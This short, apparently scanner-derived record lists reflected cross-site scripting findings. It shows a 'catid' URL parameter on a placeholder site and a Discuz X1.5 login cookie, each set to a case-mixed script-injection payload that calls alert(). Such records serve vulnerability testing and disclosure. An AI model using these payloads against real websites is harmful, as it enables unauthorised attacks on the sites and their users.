http://www.xx.com/dapu/consume.php?catid=>"><ScRiPt%20%0a%0d>alert(653554106972)%3B</ScRiPt>
这个是品牌空间
提示信息为
The GET variable catid has been set to >"><ScRiPt%20%0a%0d>alert(653554106972)%3B</ScRiPt>.
http://www.xx.com/serech.php
dzx1.5漏洞
提示信息为
The Cookie variable cyZ3_2132_loginuser has been set to >"><ScRiPt%20%0a%0d>alert(418463902591)%3B</ScRiPt>.